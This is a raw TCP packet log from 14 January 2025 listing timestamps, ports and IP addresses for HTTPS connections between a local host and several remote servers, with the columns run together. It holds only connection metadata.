                                                                                                                                                                                                                Jan 14, 2025 12:48:03.310172081 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.310193062 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.310203075 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.310244083 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.310245991 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.310256004 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.310709953 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.311083078 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.311573029 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.311614037 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.311640978 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.311650038 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.311736107 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.314518929 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.324753046 CET44349715142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.324835062 CET44349715142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.324911118 CET49715443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.326136112 CET44349717142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.326198101 CET44349717142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.326303959 CET49717443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.327090979 CET44349712142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.327220917 CET44349712142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.327289104 CET49712443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.327380896 CET44349713142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.327555895 CET44349713142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.327603102 CET49713443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.327991009 CET49715443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.328008890 CET44349715142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.328233004 CET49717443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.328268051 CET44349717142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.328453064 CET49712443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.328521013 CET44349712142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.328777075 CET49713443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.328783035 CET44349713142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.332288027 CET44349714142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.333025932 CET44349714142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.333126068 CET49714443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.333390951 CET49714443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.333405972 CET44349714142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.339910984 CET44349720142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.340888023 CET44349720142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.340955973 CET49720443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.343844891 CET49720443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.343857050 CET44349720142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.344619989 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.344640970 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.344701052 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.345413923 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.345422983 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.345916033 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.345963955 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.346225977 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.348157883 CET44349716142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.348975897 CET44349716142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.349042892 CET49716443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.349721909 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.349771023 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.351017952 CET49716443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.351051092 CET44349716142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.351687908 CET44349719142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.351741076 CET44349719142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.351807117 CET49719443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352262020 CET44349721142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352308035 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352343082 CET44349721142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352350950 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352426052 CET49721443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352456093 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352528095 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352572918 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352649927 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352664948 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352669001 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.352760077 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.353447914 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.353478909 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.353979111 CET49721443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.354000092 CET44349721142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.355245113 CET49719443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.355261087 CET44349719142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.360024929 CET44349718142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.360227108 CET44349718142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.360286951 CET49718443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.362499952 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.362530947 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.364640951 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.364676952 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.364804983 CET49718443192.168.2.6142.250.185.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.364826918 CET44349718142.250.185.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.369837046 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.369844913 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.395194054 CET49728443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.395263910 CET44349728142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.395349979 CET49728443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.395657063 CET49729443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.395689964 CET44349729142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.395747900 CET49729443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.401978970 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.402044058 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.402051926 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.402143955 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.402205944 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.467727900 CET49729443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.467771053 CET44349729142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.473450899 CET49709443192.168.2.6172.65.251.78
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.473472118 CET44349709172.65.251.78192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.634665012 CET49727443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.634716988 CET44349727142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.634794950 CET49727443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.678468943 CET49730443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.678503990 CET44349730142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.678567886 CET49730443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.679426908 CET49727443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.679440975 CET44349727142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.840249062 CET49730443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.840334892 CET44349730142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.841104031 CET49728443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.841131926 CET44349728142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.841352940 CET49731443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.841464996 CET44349731142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.841543913 CET49731443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.844172955 CET49731443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.844223976 CET44349731142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.986779928 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.986888885 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.988131046 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.988204956 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.988945961 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.988976002 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.989300013 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.990462065 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.990540981 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.994680882 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:03.994764090 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.000005007 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.000092030 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.041779995 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.043420076 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.043502092 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.043783903 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.046931982 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.046947956 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.047199965 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.048021078 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.048110962 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.048425913 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.049271107 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.049390078 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.049417019 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.049520969 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.091363907 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.095333099 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.095347881 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.095352888 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.107574940 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.107615948 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.107913017 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.111191034 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.126436949 CET44349729142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.126519918 CET49729443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.130980968 CET49729443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.130995035 CET44349729142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.131998062 CET44349729142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.133162022 CET49729443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.155378103 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.175345898 CET44349729142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.300717115 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.300878048 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.300952911 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.300986052 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.301028967 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.301079035 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.301140070 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.306322098 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.306380033 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.306411028 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.306510925 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.306565046 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.306580067 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.310583115 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.310656071 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.310681105 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.310713053 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.310722113 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.310766935 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.310803890 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312735081 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312735081 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312777042 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312805891 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312813044 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312819958 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312828064 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312835932 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312880039 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.312885046 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.316508055 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.316550970 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.316559076 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.316576004 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.316622019 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.316634893 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.317287922 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.317333937 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.317367077 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.317397118 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.317514896 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.317516088 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.317585945 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.318039894 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.318088055 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.318108082 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.318876028 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.318928957 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.318942070 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.318994045 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.319032907 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.319046974 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.319051981 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.319084883 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.319159985 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.322909117 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.322962046 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.322976112 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.323457956 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.323504925 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.323514938 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.325202942 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.325241089 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.325244904 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.329104900 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.329164028 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.329176903 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.329720020 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.329781055 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.329788923 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.330075979 CET44349727142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.330143929 CET49727443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.331456900 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.331500053 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.331504107 CET44349722142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.336132050 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.336179018 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.336186886 CET44349724142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342269897 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342318058 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342339993 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342359066 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342370033 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342402935 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342408895 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342421055 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.342467070 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.348233938 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.348275900 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.348334074 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.348349094 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.354341984 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.354408026 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.354423046 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.360554934 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.360590935 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.360605001 CET44349726142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.360707045 CET49727443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.360796928 CET44349727142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.361068010 CET44349727142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.369820118 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.369923115 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.375401974 CET49722443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.385566950 CET49724443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.387775898 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401192904 CET49726443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401335955 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401407957 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401442051 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401489019 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401554108 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401581049 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401622057 CET49723443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401638985 CET44349723142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401642084 CET44349725142.250.185.228192.168.2.6
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401669025 CET49725443192.168.2.6142.250.185.228
                                                                                                                                                                                                                Jan 14, 2025 12:48:04.401707888 CET44349725142.250.185.228192.168.2.6
